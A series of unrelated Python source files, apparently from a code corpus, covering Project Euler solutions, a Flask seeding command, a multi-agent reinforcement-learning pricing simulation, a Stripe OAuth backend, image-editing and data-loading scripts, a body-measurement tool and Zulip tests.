23053081172816430487623791969842487255036638784583\
11487696932154902810424020138335124462181441773470\
63783299490636259666498587618221225225512486764533\
67720186971698544312419572409913959008952310058822\
95548255300263520781532296796249481641953868218774\
76085327132285723110424803456124867697064507995236\
37774242535411291684276865538926205024910326572967\
23701913275725675285653248258265463092207058596522\
29798860272258331913126375147341994889534765745501\
18495701454879288984856827726077713721403798879715\
38298203783031473527721580348144513491373226651381\
34829543829199918180278916522431027392251122869539\
40957953066405232632538044100059654939159879593635\
29746152185502371307642255121183693803580388584903\
41698116222072977186158236678424689157993532961922\
62467957194401269043877107275048102390895523597457\
23189706772547915061505504953922979530901129967519\
86188088225875314529584099251203829009407770775672\
11306739708304724483816533873502340845647058077308\
82959174767140363198008187129011875491310547126581\
97623331044818386269515456334926366572897563400500\
42846280183517070527831839425882145521227251250327\
55121603546981200581762165212827652751691296897789\
32238195734329339946437501907836945765883352399886\
75506164965184775180738168837861091527357929701337\
62177842752192623401942399639168044983993173312731\
32924185707147349566916674687634660915035914677504\
99518671430235219628894890102423325116913619626622\
73267460800591547471830798392868535206946944540724\
76841822524674417161514036427982273348055556214818\
97142617910342598647204516893989422179826088076852\
87783646182799346313767754307809363333018982642090\
10848802521674670883215120185883543223812876952786\
71329612474782464538636993009049310363619763878039\
62184073572399794223406235393808339651327408011116\
66627891981488087797941876876144230030984490851411\
60661826293682836764744779239180335110989069790714\
85786944089552990653640447425576083659976645795096\
66024396409905389607120198219976047599490197230297\
64913982680032973156037120041377903785566085089252\
16730939319872750275468906903707539413042652315011\
94809377245048795150954100921645863754710598436791\
78639167021187492431995700641917969777599028300699\
15368713711936614952811305876380278410754449733078\
40789923115535562561142322423255033685442488917353\
44889911501440648020369068063960672322193204149535\
41503128880339536053299340368006977710650566631954\
81234880673210146739058568557934581403627822703280\
82616570773948327592232845941706525094512325230608\
22918802058777319719839450180888072429661980811197\
77158542502016545090413245809786882778948721859617\
72107838435069186155435662884062257473692284509516\
20849603980134001723930671666823555245252804609722\
53503534226472524250874054075591789781264330331690"
biglen = len(BIGNUM)
numcount = 100
digcount = 50
finddigcount = 10
sm = 0
i = 0
while i <= biglen - digcount:
num = int(BIGNUM[i:i + digcount])
sm += num
i += digcount
digs = str(sm)[:finddigcount]
print "The first %d digits of the sum of %d %d-digit number are: %s." % (finddigcount,
numcount,
digcount,
digs)
| StarcoderdataPython |
11302192 | <reponame>nekitdev/entrypoint.py
from typing import Any, Callable, Type, TypeVar, overload
__all__ = ("MAIN", "EntryPoint", "entrypoint", "is_main")
R = TypeVar("R")
Main = Callable[[], R]
# XXX: change to M[R] if/when HKTs get added?
M = TypeVar("M", bound=Main[Any])
MAIN = "__main__"
def is_main(name: str) -> bool:
"""Checks if `name` equals `__main__`."""
return name == MAIN
class EntryPoint:
"""Actual implementation of `@entrypoint` decorators."""
def __init__(self, name: str) -> None:
self._name = name
@property
def name(self) -> str:
return self._name
def call(self, main: M) -> M:
if is_main(self.name):
main()
return main
def __call__(self, main: M) -> M:
return self.call(main)
EP = TypeVar("EP", bound=EntryPoint)
@overload
def entrypoint(name: str) -> EntryPoint:
...
@overload
def entrypoint(name: str, entrypoint_type: Type[EP]) -> EP:
...
def entrypoint(name: str, entrypoint_type: Type[Any] = EntryPoint) -> Any:
"""Defines decorated functions as entry points.
Calls the wrapped function if the module gets run directly.
Instead of applying dark magic, this function expects
callers to pass the `__name__` variable as an argument,
and merely checks it against `__main__` when needed.
"""
return entrypoint_type(name)
| StarcoderdataPython |
1615982 | <filename>manage.py
from flask_script import Manager
from songbase import app, db, Professor, Course
manager = Manager(app)
# reset the database and create some initial data
@manager.command
def deploy():
db.drop_all()
db.create_all()
Harry = Professor(name='Harry', department='Accounting & MIS')
Professor_Hubert = Professor(name='<NAME>', department='Mathematics')
Skip = Professor(name='Skip', department='Accounting & MIS')
Professor_Davis = Professor(name="<NAME>", department= "Finance")
course1 = Course(number='MISY350', title="Application Development", description= "JS,CSS,HTML,GitHub,Python", professor=Harry)
course2 = Course(number='BUAD447', title="Data Analysis Quality Control", description="Statistical approach to operations management", professor=Professor_Hubert)
course3 = Course(number='BUAD446', title="Operations and Supply Chains", description="Learn about planning and contol in operations management", professor=Professor_Davis)
course4 = Course(number='MISY430', title="Systems Analysis and Implementation", description="Further your knowledge in database design and application concepts", professor=Skip)
db.session.add(Harry)
db.session.add(Professor_Hubert)
db.session.add(Skip)
db.session.add(Professor_Davis)
db.session.add(course1)
db.session.add(course2)
db.session.add(course3)
db.session.add(course4)
db.session.commit()
if __name__ == "__main__":
manager.run()
| StarcoderdataPython |
5079576 | def method1(ll: list) -> list:
def merge(left: list, right: list) -> list:
result = []
i, j = 0, 0
while i < len(left) and j < len(right):
if left[i] <= right[j]:
result.append(left[i])
i += 1
else:
result.append(right[j])
j += 1
result += left[i:]
result += right[j:]
return result
def mergesort(list):
if len(list) < 2:
return list
middle = len(list) / 2
left = mergesort(list[:middle])
right = mergesort(list[middle:])
return merge(left, right)
if __name__ == "__main__":
"""
l = [1, 3, 4, 7, 5, 9]
from timeit import timeit
print(timeit(lambda: method1(l), number=10000)) # 0.009614205999241676
"""
| StarcoderdataPython |
1829140 | <filename>old_source_code/Experiment 3- Tuning the first provider_s cost/wolfphc_MultiState.py<gh_stars>0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
推荐: recommend
y ∈ (0.0200,0.0500]
"""
"""
备注:notes
在这个版本中,用于计算R的x_{i,j}可以取连续的数值,由下式计算得到。
In this version, x_{i,j} used for calculating R is continous, and calcluated by the following formula
x_j = V * yAll[j] + A / d - np.e
状态:状态设置为上一时刻的卖家的联合动作
State: all the providers price at t-1
"""
import numpy as np
import matplotlib.pyplot as plt
import performance as pf
import time
def sellerAction2y(sellerAction,sellerActionSize,y_min,y_max):
y = y_min + (y_max - y_min) / sellerActionSize * sellerAction
return y
def allSellerActions2stateIndex(allSellerActions,N,sellerActionSize):
stateIndex = 0
for i in range(0,N):
stateIndex = stateIndex * sellerActionSize + allSellerActions[i]
return stateIndex
class Seller:
def __init__(self,sellerIndex,selleractionSize,stateSize,c_j,y_min,y_max):
#卖家的个人信息 provider information
self.__c = c_j #该卖家的成本系数 cost for that provider
#卖家的编号、状态空间大小、动作空间大小
# provider index, state space, and action space
self.__sellerIndex = sellerIndex
self.__stateSize = stateSize
self.__actionSize = selleractionSize
self.__y_min = y_min
self.__y_max = y_max
#当前状态、当前动作
# current state, current action
self.__currentState = np.random.randint(0,self.__stateSize)
self.__nextState = -1
self.__action = -1
self.__y = -1
#Q表、平均策略、策略、计数器
# Q table, mean policy, policy, count
self.__Q = np.zeros((self.__stateSize,self.__actionSize))
self.__policy = np.ones((self.__stateSize,self.__actionSize)) \
* (1 / self.__actionSize)
self.__meanPolicy = np.ones((self.__stateSize,self.__actionSize)) \
* (1 / self.__actionSize)
self.__count = np.zeros(self.__stateSize)
def show(self):
print("\nself.__c =",self.__c)
print("self.__sellerIndex =",self.__sellerIndex)
print("self.__stateSize =",self.__stateSize)
print("self.__actionSize =",self.__actionSize)
print("self.__y_min =",self.__y_min)
print("self.__y_max =",self.__y_max)
print("self.__currentState =",self.__currentState)
print("self.__nextState =",self.__nextState)
print("self.__action =",self.__action)
print("self.__y =",self.__y)
print("self.__Q =\n",self.__Q)
print("self.__policy =\n",self.__policy)
print("self.__meanPolicy =\n",self.__meanPolicy)
print("self.__count =\n",self.__count)
print()
def actionSelect(self):
randomNumber = np.random.random()
# print("self.__sellerIndex =",self.__sellerIndex)
# print("randomNumber =",randomNumber)
self.__action = 0
while randomNumber >= self.__policy[self.__currentState][self.__action]:
randomNumber -= self.__policy[self.__currentState][self.__action]
self.__action += 1
self.__y = sellerAction2y(self.__action,self.__actionSize,
self.__y_min,self.__y_max)
# print("self.__action =",self.__action,"\n")
return self.__action
def Qmax(self):
return max(self.__Q[self.__nextState])
def updateQ(self,allSellerActions,x_j,α,df,N,sellerActionSize):
# print("\nself.__sellerIndex =",self.__sellerIndex)
# print("self.__currentState =",self.__currentState)
# print("Q表更新前:")
# print("self.__Q[self.__currentState] =",self.__Q[self.__currentState])
# print("α =",α)
#计算即时奖励R instant reward
yAll = sellerAction2y(allSellerActions,sellerActionSize,
self.__y_min,self.__y_max)
R = self.__y / sum(yAll) * (1 / self.__y - self.__c) * sum(x_j)
# print("相应的R值 =",R)
#拿到下一时刻的状态 get next state
self.__nextState = allSellerActions2stateIndex(allSellerActions,\
N,sellerActionSize)
# print("self.__nextState =",self.__nextState)
#更新Q表 Q table update
# print("self.Qmax() =",self.Qmax())
self.__Q[self.__currentState][self.__action] = \
(1 - α) * self.__Q[self.__currentState][self.__action] \
+ α * (R + df * self.Qmax())
# print("Q表更新后:")
# print("self.__Q[self.__currentState] =",self.__Q[self.__currentState])
def updateMeanPolicy(self):
# print("平均策略更新前:")
# before mean policy updated
# print("self.__count[self.__currentState] =",self.__count[self.__currentState])
# print("self.__meanPolicy[self.__currentState] =\n",self.__meanPolicy[self.__currentState])
# print("self.__policy[self.__currentState] =\n",self.__policy[self.__currentState])
self.__count[self.__currentState] += 1
self.__meanPolicy[self.__currentState] += \
(self.__policy[self.__currentState] - \
self.__meanPolicy[self.__currentState]) \
/ self.__count[self.__currentState]
# print("平均策略更新后:")
# after mean policy updated
# print("self.__count[self.__currentState] =",self.__count[self.__currentState])
# print("self.__meanPolicy[self.__currentState] =\n",self.__meanPolicy[self.__currentState])
# print("self.__policy[self.__currentState] =\n",self.__policy[self.__currentState])
def updatePolicy(self,δ_win):
#print("\n策略更新前:self.__policy =",self.__policy)
# before policy updated
δ_lose = 50 * δ_win
# print("\n卖家",self.__sellerIndex,":") # provider
# print("策略更新前:")
# before policy updated
# print("δ_win =",δ_win,"δ_lose =",δ_lose)
# print("self.__Q[self.__currentState] =\n",self.__Q[self.__currentState])
# print("self.__action =",self.__action)
# print("self.__policy[self.__currentState] =\n",self.__policy[self.__currentState])
# print("self.__meanPolicy[self.__currentState] =\n",self.__meanPolicy[self.__currentState])
# r1 = np.dot(self.__policy[self.__currentState],self.__Q[self.__currentState])
# r2 = np.dot(self.__meanPolicy[self.__currentState],self.__Q[self.__currentState])
# print("r1 =",r1,"r2 =",r2)
if np.dot(self.__policy[self.__currentState],self.__Q[self.__currentState]) \
> np.dot(self.__meanPolicy[self.__currentState],self.__Q[self.__currentState]):
δ = δ_win
# print("δ = δ_win")
else:
δ = δ_lose
# print("δ = δ_lose")
bestAction = np.argmax(self.__Q[self.__currentState])
# print("self.__sellerIndex =",self.__sellerIndex)
# print("self.__currentState =",self.__currentState)
# print("bestAction =",bestAction)
for i in range(0,self.__actionSize):
if i == bestAction:
continue
Δ = min(self.__policy[self.__currentState][i],
δ / (self.__actionSize - 1))
self.__policy[self.__currentState][i] -= Δ
self.__policy[self.__currentState][bestAction] += Δ
# print("策略更新后:")
# print("self.__Q[self.__currentState] =\n",self.__Q[self.__currentState])
# print("self.__policy[self.__currentState] =\n",self.__policy[self.__currentState])
def updateState(self):
# print("状态更新前:")
# before state updated
# print("self.__currentState =",self.__currentState)
self.__currentState = self.__nextState
# print("状态更新后:")
# after state updated
# print("self.__currentState =",self.__currentState)
def showPolicy(self):
print("\n卖家",self.__sellerIndex,":") # provider
print("self.__meanPolicy =\n",self.__meanPolicy)
print("self.__policy =\n",self.__policy)
class Record:
def __init__(self,N,length):
self.__index = 0
self.__N = N
self.__length = length
self.__arr = np.array([[-1] * self.__N] * self.__length)#self.__arr是np.array类型的
# self.__arr is np array
def isConverged(self,actions):
self.__arr[self.__index] = actions#actions的类型是np.array
# action is np array
self.__index = (self.__index + 1) % self.__length
variance = np.var(self.__arr,axis = 0)
if sum(variance) == 0:
# #画出arr
# plot arr
# self.__arr = self.__arr.T
# iterations = range(0,self.__length)
# plt.figure()
# for j in range(0,self.__N):
# plt.plot(iterations,self.__arr[j],"o:",label = "seller %d"%(j + 1))
# plt.legend()
# plt.xlabel("the last %d iterations"%self.__length)
# plt.ylabel("actions")
# plt.savefig("收敛曲线.jpg",dpi = 300)
# covergency plot
# plt.show()
return True
else:
return False
def wolfphc_MultiState(N,M,c,V,a,y_min,y_max,actionNumber):
#******(1)设置参数************* paramter seting
#Q表参数 Q table
df = 0.30 #discount factor,折扣因子。推荐:df ∈ [0.88,0.99]
# discount factor--recommend df ∈ [0.88,0.99]
α = 1 / 3 #用于更新Q值的学习率 learning rate for updating Q table
#卖家参数 provider paramters
sellerActionSize = actionNumber #卖家动作数 provider actions
stateSize = sellerActionSize ** N
#******(2)初始化卖家们************* initilize providers
#初始化卖家 initilization
sellers = []
for j in range(0,N):
tmpSeller = Seller(j,sellerActionSize,stateSize,c[j],y_min,y_max)
# tmpSeller.show()
sellers.append(tmpSeller)
#******(3)更新Q表、平均策略、策略*************
# update Q table, mean policy and policy
record = Record(N,500)#用于记录最近的连续500次的【所有卖家的动作的编号】#用于判断是否收敛
# record the most recent 500 iterations [all the devices' index], for convergency checking
start = time.perf_counter()
timeLimit_min = 2 #timeLimit_min是以分钟为单位的限定时间 the unit of timeLimit_min is minutes
t = -1
while 1:
#参数 parameters
t += 1
δ_win = 1 / (500 + 0.1 * t)
#获得联结动作 actions get all the providers action
allSellerActions = []
for tmpSeller in sellers:
allSellerActions.append(tmpSeller.actionSelect())
allSellerActions = np.array(allSellerActions)
yAll = sellerAction2y(allSellerActions,sellerActionSize,y_min,y_max)
#更新Q表、平均策略、策略
# update Q table, mean policy and policy
#print("\n更新Q表、平均策略、策略:")
#print update Q table, mean policy and policy
for j in range(0,N):
x_j = V * yAll[j] + a - np.e
sellers[j].updateQ(allSellerActions,x_j,α,df,N,sellerActionSize)
sellers[j].updateMeanPolicy()
sellers[j].updatePolicy(δ_win)
sellers[j].updateState()
#判断是否已经收敛 check whether convergent
#判断标准,如果在【最近的连续500次迭代】中,【所有卖家的报价】保持不变,则认为是已经收敛
# check stardand, if all the providers' price remain the same in the most recent
# 500 iterations, then we consider converges
if record.isConverged(allSellerActions) == True:
break
#判断是否超出限定时间。如果超出,则返回False。
# check convergence time, if over time, return False
stop = time.perf_counter()
if (stop - start) / 60.0 > timeLimit_min:
return False
#Wolfphc算法结束 Wolfphc algorithm ends
#******(4)返回 由【每个卖家的效益】组成的数组*************
# return array of [each provider's utility]
#拿到X[] get X[]
X = []
for j in range(0,N):
x_j = V * yAll[j] + a - np.e #x_j是np.array x_j is np array
X.append(x_j)
X = np.array(X)
#返回由【每个卖家的效益】组成的数组
# return array of [each provider's utility]
return pf.sellerRevenuesCalculator(X,yAll,N) - pf.sellerExpensesCalculator(X,yAll,c,N)
#******(5)打印结果、画变化曲线*************
# print("\n打印policy:")
# for tmpSeller in sellers:
# tmpSeller.showPolicy()
#打印出所有卖家最后的单价p
# P = Y[-1]
# P = 1 / P
#print("\n打印结果:")
#print("P =",P)
#画出Y的每一行,就是每一个卖家的y的变化
# Y = np.array(Y)
# Y = Y.T
# iteration = range(0,np.shape(Y)[1])
# plt.figure()
# for j in range(0,N):
# plt.plot(iteration,Y[j],label = "seller %d"%j)
# plt.legend(loc=2,ncol=1)
# plt.xlabel('iteration')
# plt.ylabel('y')
# plt.savefig('yWith%dSellersAnd%dBuyer.jpg'%(N,M), dpi=300)
# plt.show()
print("\nwolfphc_MultiSate:\nactions = %r"%allSellerActions) | StarcoderdataPython |
6451273 | """
Stripe OAuth2 support.
This backend adds support for Stripe OAuth2 service. The settings
STRIPE_APP_ID and STRIPE_API_SECRET must be defined with the values
given by Stripe application registration process.
"""
from social_auth.backends import BaseOAuth2, OAuthBackend, USERNAME
from social_auth.exceptions import AuthFailed, AuthCanceled
class StripeBackend(OAuthBackend):
"""Stripe OAuth2 authentication backend"""
name = 'stripe'
ID_KEY = 'stripe_user_id'
EXTRA_DATA = [
('stripe_publishable_key', 'stripe_publishable_key'),
('access_token', 'access_token'),
('livemode', 'livemode'),
('token_type', 'token_type'),
('refresh_token', 'refresh_token'),
('stripe_user_id', 'stripe_user_id'),
]
def get_user_details(self, response):
"""Return user details from Stripe account"""
return {USERNAME: response.get('stripe_user_id'),
'email': ''}
class StripeAuth(BaseOAuth2):
"""Facebook OAuth2 support"""
AUTH_BACKEND = StripeBackend
AUTHORIZATION_URL = 'https://connect.stripe.com/oauth/authorize'
ACCESS_TOKEN_URL = 'https://connect.stripe.com/oauth/token'
SCOPE_VAR_NAME = 'STRIPE_SCOPE'
SETTINGS_KEY_NAME = 'STRIPE_APP_ID'
SETTINGS_SECRET_NAME = 'STRIPE_APP_SECRET'
# Stripe changes the state parameter on some unclear way and doesn't send
# the redirect_state value if was defined in redirect_uri, they redirect to
# the URL defined in the app only
REDIRECT_STATE = False
STATE_PARAMETER = False
def process_error(self, data):
if self.data.get('error'):
error = self.data.get('error_description') or self.data['error']
if self.data['error'] == 'access_denied':
raise AuthCanceled(self, error)
else:
raise AuthFailed(self, error)
def auth_params(self, state=None):
client_id, client_secret = self.get_key_and_secret()
return {
'response_type': self.RESPONSE_TYPE,
'client_id': client_id
}
def auth_complete_params(self, state=None):
client_id, client_secret = self.get_key_and_secret()
return {
'grant_type': 'authorization_code',
'client_id': client_id,
'scope': self.SCOPE_SEPARATOR.join(self.get_scope()),
'code': self.data['code']
}
def auth_complete_headers(self):
client_id, client_secret = self.get_key_and_secret()
return {
'Accept': 'application/json',
'Authorization': 'Bearer %s' % client_secret
}
# Backend definition
BACKENDS = {
'stripe': StripeAuth
}
| StarcoderdataPython |
3521452 | # projecteuler.net/problem=19
days = ('sun', 'mon', 'tue', 'wed', 'thu', 'fri', 'sat')
month = ('jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul', 'aug', 'sep', 'oct', 'nov', 'dec')
d_mon = ( 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31)
d_mon_leap = ( 31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31)
start_year = 1900
count_year = 1901
days_in_year = 365
# 01.01.1901 - Tuesday
def main():
answer = CountingSundays()
print(answer)
def CountingSundays():
counter = 0
daily_iter = 1 # for starting year 01.01.1901 - Tuesday
for yr in range(1901, 2001):
m = ()
if yr % 4 == 0 and yr % 100 != 0 or yr % 400 == 0:
m = d_mon_leap
else:
m = d_mon
i = 0
for mh in month:
for ds in range(1, m[i]+1):
daily_iter += 1
if daily_iter >= 7:
daily_iter = 0
if daily_iter == 0 and ds == 1:
counter += 1
#print("{0}.{1}.{2}: {3}".format(ds, mh, yr, days[daily_iter]))
i += 1
return(counter)
if __name__ == '__main__':
main()
| StarcoderdataPython |
12820161 | <reponame>phygitalism/PTI
import argparse
import os
import sys
import pickle
import numpy as np
from tqdm import tqdm
from PIL import Image
import torch
from configs import paths_config, hyperparameters, global_config
from utils.align_data import pre_process_images
from scripts.run_pti import run_PTI
from IPython.display import display
import matplotlib.pyplot as plt
from scripts.latent_editor_wrapper import LatentEditorWrapper
import shutil
def load_generators(model_id, image_name):
with open(f'{paths_config.checkpoints_dir}/model_{model_id}_{image_name}.pt', 'rb') as f_new:
new_G = torch.load(f_new).cuda()
return new_G
def gen_vec(image_name, latent_editor, alpha, step):
w_path_dir = f'{paths_config.embedding_base_dir}/{paths_config.input_data_id}'
embedding_dir = f'{w_path_dir}/{paths_config.pti_results_keyword}/{image_name}'
w_pivot = torch.load(f'{embedding_dir}/0.pt')
latents_vec = latent_editor.get_single_interface_gan_edits(w_pivot, np.linspace(-alpha, alpha, step))
return latents_vec
def gen_img(image_name, model_id, latents_vec, base_save_path):
image_name, ext = image_name.split('.')
generator_type = paths_config.multi_id_model_type if hyperparameters.use_multi_id_training else image_name
new_G = load_generators(model_id, generator_type)
for direction, factor_and_edit in latents_vec.items():
for val, latent in factor_and_edit.items():
img = new_G.synthesis(latent, noise_mode='const', force_fp32 = True)
img = (img.permute(0, 2, 3, 1) * 127.5 + 128).clamp(0, 255).to(torch.uint8).cpu().numpy()[0]
img = Image.fromarray(img, mode='RGB')
path = os.path.join(base_save_path, image_name, direction)
os.makedirs(path, exist_ok=True)
img.save(os.path.join(path, str(val) + "_" + image_name + '.' + ext))
def evaluate(args):
os.makedirs(paths_config.input_data_path, exist_ok=True)
pre_process_images('/home/data/image_original')
model_id = run_PTI(use_wandb=False, use_multi_id_training=hyperparameters.use_multi_id_training)
latent_editor = LatentEditorWrapper()
name_list = os.listdir('/home/data/image_original')
base_save_path = os.path.join('/home/data/image_results', paths_config.input_data_id)
os.makedirs(base_save_path, exist_ok=True)
with torch.no_grad():
for image_name in tqdm(name_list):
latents_vec = gen_vec(image_name.split('.')[0], latent_editor, alpha=args.alpha, step=args.step)
gen_img(image_name, model_id, latents_vec, base_save_path)
print(f'Done for {image_name}')
def clean_up():
shutil.rmtree(paths_config.input_data_path)
shutil.rmtree(paths_config.checkpoints_dir)
shutil.rmtree(paths_config.embedding_base_dir)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--alpha", type=float, default=10, help="[-alpha,... alpha] range")
parser.add_argument("--step", type=int, default=20, help="num for numpy.linspace")
parser.add_argument("--data_name", type=str, default='test', help="dataset name")
parser.add_argument('--clean_up', action='store_true', default=True, help='delete permanent files after run')
args = parser.parse_args()
paths_config.input_data_id = args.data_name
evaluate(args)
if args.clean_up:
clean_up() | StarcoderdataPython |
278892 | from django.db import models
from django.contrib.auth import get_user_model
# Create your models here.
class Book(models.Model):
title = models.CharField(max_length=50)
author = models.CharField(max_length=30)
description = models.TextField(blank=True)
publisher_book_url = models.URLField()
released_on = models.DateTimeField(auto_now_add=True)
posted_user = models.ForeignKey(get_user_model(), null=True, on_delete=models.CASCADE)
| StarcoderdataPython |
6689710 | import cv2
from tensorflow import keras
import numpy as np
from config import debug
from augmentation import get_random_affine_transformation
import matplotlib.pyplot as plt
from data_utils import is_annotation
class VagusDataLoader(keras.utils.Sequence):
"""
Custom Data Loader class to iterate over the data (as Numpy arrays)
Attributes
---------------
batch_size: int
the number of images would be loaded in a batch
img_size: tuple (int, int)
the size of the image being loaded
input_img_paths: str
system paths to the input (original) images
target_img_paths: str
system paths to the target (mask) images
"""
def __init__(self, batch_size, img_size, input_img_paths, target_img_paths):
""" Class constructor """
self.batch_size = batch_size
self.img_size = img_size
self.input_img_paths = input_img_paths
self.target_img_paths = target_img_paths
def __len__(self):
""" Overriding len() """
return len(self.target_img_paths) // self.batch_size
def __getitem__(self, idx):
"""
Overriding get()
Parameters
---------------
idx: int
The index of the current batch to get from the dataset
Returns
---------------
the idx-th batch of images in the tuple format of (input, target)
"""
i = idx * self.batch_size
batch_input_img_paths = self.input_img_paths[i : i + self.batch_size]
batch_target_img_paths = self.target_img_paths[i : i + self.batch_size]
x = np.zeros((self.batch_size,) + self.img_size + (3,), dtype="float32")
y = np.zeros((self.batch_size,) + self.img_size + (1,), dtype="uint8")
for j, (img_path, target_path) in enumerate(zip(batch_input_img_paths, batch_target_img_paths)):
img = np.load(img_path)
annotation = np.load(target_path)
annotation = np.expand_dims(annotation, axis=2)
current_transform = get_random_affine_transformation()
augmented_img = current_transform(img, do_colour_transform=False)
augmented_annotation = current_transform(annotation, is_annotation=True, do_colour_transform=False)
augmented_annotation = cv2.threshold(augmented_annotation, 0.5, 1, cv2.THRESH_BINARY)[1]
augmented_annotation = np.expand_dims(augmented_annotation, axis=2)
x[j] = augmented_img
y[j] = augmented_annotation
# Useful debug code
if debug:
print(f'Data loader first x, y pair - x shape: {x.shape}, x min max: {np.min(x)}, {np.max(x)}, y shape: {y.shape}, y values: {np.unique(y, return_counts=True)}')
print('x')
plt.imshow(x[0, :, :, :])
plt.show()
print('y')
plt.imshow(y[0, :, :, 0])
plt.show()
# Final checks on tensor formats
assert is_annotation(y), print(np.unique(y))
assert np.max(x) <= 1 and np.min(x) >= 0, print(np.unique(x))
assert x.shape[-1] == 3
return x, y | StarcoderdataPython |
109197 | <filename>src/features/main_measure.py
# -*- coding: utf-8 -*-
"""
Created on Mon Nov 15 08:44:26 2021
@author: gabri
"""
from features.utils import *
def main(filename = None):
print(filename,os.getcwd())
#running with FASTAPI
if(filename is not None):
os.environ['filename'],file_extension = filename.split('.')[:]
print('../data/processed' + filename)
rgb = cv2.imread(os.path.join('../data/processed' , filename))
print(rgb.shape)
os.environ['label_path'] = '../labels/processed/'
else:
file_extension = os.environ['filename'].split('.')[1]
#get image in rgb,yuv,grayscale
rgb = cv2.imread( os.path.join(os.environ['image_path'] ,os.environ['filename']))
yuv = cv2.cvtColor(rgb, cv2.COLOR_RGB2YUV)
gray = cv2.cvtColor(rgb, cv2.COLOR_RGB2GRAY)
#get entropy image
entr_img = entropy(gray, disk(5))
scaled_entropy = entr_img / entr_img.max()
entr_img = scaled_entropy
#for debugging purposes: entropy image
# plt.imshow(entr_img > 0.4)
# plt.show()
#stack rgb and yuv for more information about the colours and their intensities
rgb_yuv = np.concatenate((np.array(rgb),np.array(yuv) ), axis = 2 )
json_file = os.environ['filename'].split('.')[0] + ".json"
with open( os.path.join(os.environ['label_path'] ,json_file) ) as f:
data = json.load(f)
pose_keypoints = data['people'][0]['pose_keypoints_2d']
#drawing keypoints over the image for understanding what is what
counter = 1
keypoint_list = {}
toKeep = [3,4,5,6,7,8,9,10,11,13,12,14,15]
for i in range(0,len(pose_keypoints),3):
x,y = pose_keypoints[i],pose_keypoints[i+1]
x,y = int(x),int(y)
if(counter in toKeep):
keypoint_list[str(counter)] = (x,y)
cv2.circle(rgb, (x,y), radius=0, color=(0, 0, 255), thickness=5)
cv2.putText(rgb, str(counter), (x - 20, y - 20),
cv2.FONT_HERSHEY_SIMPLEX, 0.65, (0, 255, 0), 2)
counter +=1
#building human readable dictionary
keypoint_dict = build_dict(keypoint_list)
height,width,_ = rgb.shape
#create gabor kernels
kernels = create_gabor_kernels()
#get hip line
full_line ,waist_line,_,_ =get_line(keypoint_dict['l_hip'],keypoint_dict['r_hip'], width)
#get training data
train_x,train_y,test_x = get_data(keypoint_dict,full_line,waist_line, rgb_yuv,entr_img,kernels)
#predicti pixel over the hip line
pred = predict_pixel_values(keypoint_dict,train_x,train_y,test_x)
#for debuggin purposes
res_line = []
for i in range(len(pred)):
x,y = full_line[i]
res = np.argmax(pred[i])
res_line.append(res)
if(res == 0):
cv2.circle(rgb, (x+3,y), radius=0, color=(255, 0, 0), thickness=5)
#approximate waist width
toll = 10
l_w_point = keypoint_dict['l_h']
for i in range(0,keypoint_dict['l_hip'][0],1):
if(res_line[i] == 1):
toll -= 1
else:
toll= 10
if( toll == 0):
x,y = full_line[i]
l_w_point = [x+3-10,y]
cv2.circle(rgb, (x+3-10,y), radius=0, color=(0, 255, 0), thickness=20)
break
toll = 10
r_w_point = keypoint_dict['r_h']
for i in range(rgb.shape[1]-8,keypoint_dict['r_hip'][0],-1):
if(res_line[i] == 1):
toll -= 1
else:
toll= 10
if( toll == 0):
x,y = full_line[i]
r_w_point = [x-4+10,y]
cv2.circle(rgb, (x-4+10,y), radius=0, color=(0, 255, 0), thickness=20)
break
full_shoulder_line,shoulder_line,_,_ =get_line(keypoint_dict['l_s'],keypoint_dict['r_s'],width)
get_arm_boundaries(full_shoulder_line,gray)
mean_leg_length,mean_arm_length = get_measures(keypoint_dict)
hip_length = abs(np.linalg.norm(np.array(l_w_point)-np.array(r_w_point)))
get_upper_body_measures(keypoint_dict,width,rgb)
print('leg length: {}, arm length: {}, hip_length: {}'.format(mean_leg_length,mean_arm_length,hip_length))
rgb = cv2.resize(rgb, ( int(width/2),int(height/2) ))
cv2.imshow('img',rgb)
cv2.waitKey(0)
res = {}
res['leg-length'] = mean_leg_length
res['arm-length'] = mean_arm_length
res['hip-length'] = hip_length
return json.dumps(res)
def dir_path(string):
if os.path.isdir(string):
return string.replace('\\','/')
else:
raise NotADirectoryError(string)
if __name__ == "__main__":
# initialize ArgumentParser class of argparse
parser = argparse.ArgumentParser()
# where the original images (used for creating the synthetic images) are
parser.add_argument(
"--image_path",
type=str
)
parser.add_argument(
"--label_path",
type=str
)
parser.add_argument(
"--filename",
type=str
)
args = parser.parse_args()
assert(args.image_path is not None)
os.environ['image_path'] = args.image_path.replace('\\\\', ' ')
assert(args.label_path is not None)
os.environ['label_path'] = args.label_path.replace('\\\\', ' ')
assert(args.filename is not None)
os.environ['filename'] = args.filename
main()
| StarcoderdataPython |
6691103 | from datetime import datetime, timedelta, timezone
from typing import Any, Dict
from unittest import mock
from django.utils.timezone import now as timezone_now
from zerver.lib.stream_topic import StreamTopicTarget
from zerver.lib.test_classes import ZulipTestCase
from zerver.lib.topic_mutes import (
add_topic_mute,
get_topic_mutes,
remove_topic_mute,
topic_is_muted,
)
from zerver.models import MutedTopic, UserProfile, get_stream
class MutedTopicsTests(ZulipTestCase):
def test_user_ids_muting_topic(self) -> None:
hamlet = self.example_user("hamlet")
cordelia = self.example_user("cordelia")
realm = hamlet.realm
stream = get_stream("Verona", realm)
recipient = stream.recipient
topic_name = "teST topic"
stream_topic_target = StreamTopicTarget(
stream_id=stream.id,
topic_name=topic_name,
)
user_ids = stream_topic_target.user_ids_muting_topic()
self.assertEqual(user_ids, set())
def mute_user(user: UserProfile) -> None:
add_topic_mute(
user_profile=user,
stream_id=stream.id,
recipient_id=recipient.id,
topic_name="test TOPIC",
date_muted=timezone_now(),
)
mute_user(hamlet)
user_ids = stream_topic_target.user_ids_muting_topic()
self.assertEqual(user_ids, {hamlet.id})
hamlet_date_muted = MutedTopic.objects.filter(user_profile=hamlet)[0].date_muted
self.assertTrue(timezone_now() - hamlet_date_muted <= timedelta(seconds=100))
mute_user(cordelia)
user_ids = stream_topic_target.user_ids_muting_topic()
self.assertEqual(user_ids, {hamlet.id, cordelia.id})
cordelia_date_muted = MutedTopic.objects.filter(user_profile=cordelia)[0].date_muted
self.assertTrue(timezone_now() - cordelia_date_muted <= timedelta(seconds=100))
